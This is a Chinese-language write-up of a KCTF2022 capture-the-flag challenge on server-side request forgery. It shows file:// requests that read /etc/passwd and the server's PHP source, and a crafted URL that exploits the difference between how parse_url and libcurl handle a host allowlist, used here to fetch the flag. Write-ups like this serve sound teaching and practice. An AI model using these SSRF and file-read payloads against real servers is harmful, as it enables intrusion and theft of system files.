-
-
[原创]KCTF2022 Q1 第四题 飞蛾扑火
-
2022-5-16 22:41 8161
-
KCTF2022 Q1 第四题 飞蛾扑火
考点:ssrf & url bypass
1 2 3 4 5 6 7 8 9 10 | <html> <head> <meta charset = "utf-8" > <title>欢迎挑战 Design by 香草< / title> < / head> <body> <! - - phpinfo.php - - > <img src = "url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png" > < / body> < / html> |
看到phpinfo.php
和url.php
想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd
读取下url.php
1 | curl http: / / 121.36 . 145.157 : 8044 / url.php?url = file : / / 127.0 . 0.1 / var / www / html / url.php |
主干
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | $url = $_GET[ "url" ]; $uu = parse_url($url); $host = isset($uu[ "host" ])?$uu[ "host" ]:""; $scheme = isset($uu[ "scheme" ])?$uu[ "scheme" ]:""; if (empty($host)){ die( "host is null" ); } if (empty($scheme)){ die( "scheme is null" ); } / / https: / / ctf.pediy.com / upload / team / 762 / team236762.png? if ($host = = "ctf.pediy.com" ||$host = = "127.0.0.1" ||$host = = "localhost" ){ / / echo curl_request( "http://123.57.254.42/flag.php" , "get" ,[],true, 5 ); / / get flag echo curl_request($url,'', "get" ,[],true, 5 ); } else { die( "host not allow" ); } |
需要绕过parse_url和libcurl
构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php
得到flag:flag{xxx_999()xx*@eeEEE}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
看原图